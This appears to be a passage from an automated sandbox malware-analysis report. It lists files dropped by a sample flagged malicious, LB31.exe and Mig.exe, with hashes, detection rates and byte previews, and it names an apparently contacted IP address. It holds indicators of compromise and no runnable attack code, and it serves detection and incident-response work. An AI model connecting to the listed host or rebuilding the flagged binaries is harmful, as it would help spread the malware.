                                          • 176.113.115.19

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Users\user\AppData\Roaming\LB31.exefile.exeGet hashmaliciousUnknownBrowse
                                            YSU1PShcKh.exeGet hashmaliciousUnknownBrowse
                                              file.exeGet hashmaliciousUnknownBrowse
                                                C:\ProgramData\Mig\Mig.exefile.exeGet hashmaliciousUnknownBrowse
                                                  YSU1PShcKh.exeGet hashmaliciousUnknownBrowse
                                                    file.exeGet hashmaliciousUnknownBrowse

                                                      Created / dropped Files

                                                      C:\ProgramData\Mig\Mig.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\LB31.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):7679488
                                                      Entropy (8bit):7.744308216067832
                                                      Encrypted:false
                                                      SSDEEP:196608:/UUPSHwaRhOgwVPj04wfOAlM69LJDuHF:dKHwgt+Pov7y
                                                      MD5:C9E6AA21979D5FC710F1F2E8226D9DFE
                                                      SHA1:D881F97A1FE03F43BED2A9609EAE65531CF710CF
                                                      SHA-256:A1A8CFCC74F8F96FD09115189DEFE07AC6FC2E85A9FF3B3EC9C6F454AEDE1C1D
                                                      SHA-512:9E90BCB64B0E1F03E05990CDEAD076B4C6E0B050932ECB953DAE50B7E92B823A80FC66D1FD8753591719E89B405757B2BF7518814BC6A19BB745124D1A691627
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                      Joe Sandbox View:
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: YSU1PShcKh.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...^n.e.........."..........xT...............@.....................................u...`...................................................U.......S.f... ..............."..............................`"..(................................................... . ..S.......R.................@....rsrc...f.....S.......R.............@....idata ......U.......S.............@... ..8...U.......S.............@...ndryujmp.p!..`...f!...S.............@...tnyudguu............*u.............@....pdata.I............,u.............@..@................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):11608
                                                      Entropy (8bit):4.890472898059848
                                                      Encrypted:false
                                                      SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                      MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                      SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                      SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                      SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                      Malicious:false
                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10ukklzn.b2x.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1e54ndq3.1so.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_24ogwzyv.kvw.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dspuosct.vsr.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxtaebcx.qn0.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hozi4ij2.k0v.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lwikcwc0.goo.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_poxkbpyo.ntz.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qi4otcyu.vxz.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvuuqnpm.5dw.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Roaming\LB31.exe

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):7679488
                                                      Entropy (8bit):7.744308216067832
                                                      Encrypted:false
                                                      SSDEEP:196608:/UUPSHwaRhOgwVPj04wfOAlM69LJDuHF:dKHwgt+Pov7y
                                                      MD5:C9E6AA21979D5FC710F1F2E8226D9DFE
                                                      SHA1:D881F97A1FE03F43BED2A9609EAE65531CF710CF
                                                      SHA-256:A1A8CFCC74F8F96FD09115189DEFE07AC6FC2E85A9FF3B3EC9C6F454AEDE1C1D
                                                      SHA-512:9E90BCB64B0E1F03E05990CDEAD076B4C6E0B050932ECB953DAE50B7E92B823A80FC66D1FD8753591719E89B405757B2BF7518814BC6A19BB745124D1A691627
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                      Joe Sandbox View:
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: YSU1PShcKh.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...^n.e.........."..........xT...............@.....................................u...`...................................................U.......S.f... ..............."..............................`"..(................................................... . ..S.......R.................@....rsrc...f.....S.......R.............@....idata ......U.......S.............@... ..8...U.......S.............@...ndryujmp.p!..`...f!...S.............@...tnyudguu............*u.............@....pdata.I............,u.............@..@................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):6220
                                                      Entropy (8bit):3.719493935896565
                                                      Encrypted:false
                                                      SSDEEP:48:yu4tZbh3Cg7oU2f/oukvhkvklCyw3ugjGlC+0UlLfSogZooLmtDGlC+0UlgFfSoZ:AZ13Cg14ZkvhkvCCt7Gt0UgHkGt0UDH4
                                                      MD5:1716E6336F5D24FE1700270B7E1F893D
                                                      SHA1:5AFC31268658CC090B6FF5796A0FFE8098D68F7E
                                                      SHA-256:2BD2C81A1C3CC7F1C9F7A725BB9F68F9FD496577B8B74FB7098CD308F153ACA2
                                                      SHA-512:4EBD6A914A21A39F54B7A28706625E2280BB8E143EDF55D2CF52FCEE69AE33B1C50CD64CCA46628799E0B6463FFAB28EEE31704BEAFF65754B6D97309F28AFC2
                                                      Malicious:false
                                                      Preview:...................................FL..................F.".. ....N.5q....G..MQ..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q.....{.MQ..W...MQ......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.i...........................c..A.p.p.D.a.t.a...B.V.1......Y.h..Roaming.@......EW)N.Y.h..............................R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.h..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.Y.h..............................W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Y.h....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Y.h....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.i................

                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BL8WHWNPB4EE0YLYO57C.temp

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):6220
                                                      Entropy (8bit):3.719493935896565
                                                      Encrypted:false
                                                      SSDEEP:48:yu4tZbh3Cg7oU2f/oukvhkvklCyw3ugjGlC+0UlLfSogZooLmtDGlC+0UlgFfSoZ:AZ13Cg14ZkvhkvCCt7Gt0UgHkGt0UDH4
                                                      MD5:1716E6336F5D24FE1700270B7E1F893D
                                                      SHA1:5AFC31268658CC090B6FF5796A0FFE8098D68F7E
                                                      SHA-256:2BD2C81A1C3CC7F1C9F7A725BB9F68F9FD496577B8B74FB7098CD308F153ACA2
                                                      SHA-512:4EBD6A914A21A39F54B7A28706625E2280BB8E143EDF55D2CF52FCEE69AE33B1C50CD64CCA46628799E0B6463FFAB28EEE31704BEAFF65754B6D97309F28AFC2
                                                      Malicious:false
                                                      Preview:...................................FL..................F.".. ....N.5q....G..MQ..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q.....{.MQ..W...MQ......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.i...........................c..A.p.p.D.a.t.a...B.V.1......Y.h..Roaming.@......EW)N.Y.h..............................R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.h..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.Y.h..............................W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Y.h....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Y.h....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.i................

                                                      C:\Windows\System32\winevt\Logs\Application.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):68936
                                                      Entropy (8bit):3.9054455369113112
                                                      Encrypted:false
                                                      SSDEEP:768:dY1Ydb2QlgVc3gkbBxagkuhcHba5F6cGP5W1Hjr:p2bcd/3hc7dcGP6
                                                      MD5:09215912B94D29FFFF3F06D91398B86D
                                                      SHA1:DF2386462CE92080D8E0BC88017459FC580CCCD8
                                                      SHA-256:2E22029F932480A784852F41AD5D5423EBDA42C053BF220E10255D0B248B1D8C
                                                      SHA-512:153D9802405CA3CAE2FC134A368B91A92A7838A898AFFC77D5FA198C1C20A0B37F101008392CBB37BA0FEB806D28CEAF980B375AD0C003C06C5553551994D108
                                                      Malicious:false
                                                      Preview:ElfChnk.................G.......H...........X...H...6......................................................................8.I............................................=...........................................................................................................................g...............@...........................n...................M...]...........................f...........~.......................&...................................................................................**..X...G.......@...MQ.........U..&........U..,ho^V......\........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 335, DIRTY
                                                      Category:dropped
                                                      Size (bytes):125056
                                                      Entropy (8bit):4.131376567209689
                                                      Encrypted:false
                                                      SSDEEP:768:/VUHiapX7xadptrDT9W84c+XL2WeVUHiapX7xadptrDT9W84c+XL2W:eHi6xadptrX9WPB5Hi6xadptrX9WPB
                                                      MD5:0E5A242FDCE57398EC0A97F59B2AFAFF
                                                      SHA1:77634172CF210811479F75EECB4D0684B07548ED
                                                      SHA-256:2068AB73A93FE33C37D1FB078DF47D52C31818DD9D2040C0AC04B98F0292B992
                                                      SHA-512:DE74B25ACAD2ADD0E90E8F56B9E3E0EE6DED7BA8CE739C55243CEE454850B9A1BF6B78E264212A38A0D32F3319DE6F0A298389AF0F935CA59F846E40AD379FB5
                                                      Malicious:false
                                                      Preview:ElfFile.................O...................................................................................................J.4#ElfChnk.........P...............P...........h.........Z....................................................................}02z................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.382120578185277
                                                      Encrypted:false
                                                      SSDEEP:768:T8wgVFdXH6BGoiwv3SudzEIhAg5+530pDWEAqKG:4rVFdXH6BGoTWfg5+530pD9
                                                      MD5:A9C9467E960F3B3FAD5AA2A6E5E9F12B
                                                      SHA1:704696EE95709D5E7343F021C78793824E8CEA1B
                                                      SHA-256:E32DA9BB844B658ED2BF03FFD0D4871EF175D3E559A27D397C3DE5521525C452
                                                      SHA-512:FCB3242F11BFD7F544CC0D96117AA300E2520DFA8C431B0DD43D22018FE656FBAD606609D777574EA907511083A79A5A3FF01CF172568789840CD985FF173888
                                                      Malicious:false
                                                      Preview:ElfChnk.~...............~.......................0............................................................................GP.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...................US......................UZ..............&............0...........{......................5z..................EW..................**......~........O.s.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.262323517471838
                                                      Encrypted:false
                                                      SSDEEP:384:zhGVCVEVEVw7VQJVaVZVqVQVjVbVXVEVpg8VNVwVZVkV4VSVsVdVyVfVfVAVEVpE:zxgb0
                                                      MD5:B0E8D1E0EA1BD787FF4B8197909A8595
                                                      SHA1:391233CD90217754604AD7FDF55FB932E3E02B2E
                                                      SHA-256:835D8DD04880EA514D57C34C8DE873CFA436FD9050FB4BB98C79C768371ABAC2
                                                      SHA-512:240F2F3301ECE865DADF8F235DBA9835C60E3AC4C85B30233DCC00971C14FDAE6234D21448154C58C37A71CCD25C4435DF93D5533C2B16581BEE09AD3FF7A6BB
                                                      Malicious:false
                                                      Preview:ElfChnk.p...............p...................0.......h.g4.......................................................................L........................................V...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................&.......................q!......................................**......p.......Cb..v.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.419521241374568
                                                      Encrypted:false
                                                      SSDEEP:384:thomEmXOVmJGmNk4m5TiAmMmqm2mcmWmamqmHjCsmcNmv9mamimfmfm1mlmoAmCY:tJk3TiJKSwTpsc6QfBg8FEQl
                                                      MD5:3A8C83DF99779D004CCAC844AF48273C
                                                      SHA1:CB2BAE41CD31700AF536AAE3E2E1A2628570E39B
                                                      SHA-256:DEB5138936907B655F637B63904FD5EEE5D83FE6DF5898ACE41017DC54FC4E6C
                                                      SHA-512:C4E9A2E508273E9BC3F24A74D6FF449A402CEFBEEBD0C56FF1C4B0D6EC6122E9656386FF7B60D90913017C80EE64BBFCFF6EE013FCD68C0826D8A8C9C930FC75
                                                      Malicious:false
                                                      Preview:ElfChnk../.......0......./.......0..........`...@...g-.........................................................................~................h...........................=...........................................................................................................................f...............?...........................m...................M...F...............................S....'...,..................[........7..........3.......K.............A...k#...1..s:......k............v..........**......./......0$4.s.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.511520218386084
                                                      Encrypted:false
                                                      SSDEEP:96:ENVaO8sMa3Z85ZMLp3Z85ZRr3Z85ZM3Z85ZRrjj3/3Z85Zu:aV7pp8nMLpp8nZp8nMp8nZv3/p8n
                                                      MD5:545DD807ECFB4E07768C413C134FFA10
                                                      SHA1:87EAF68E44466CEFECAD08EC991558132A820740
                                                      SHA-256:979D30C5A086ACC0D4226D22C38C22D60BA3D88229A923D5C706CD2DC74DD99E
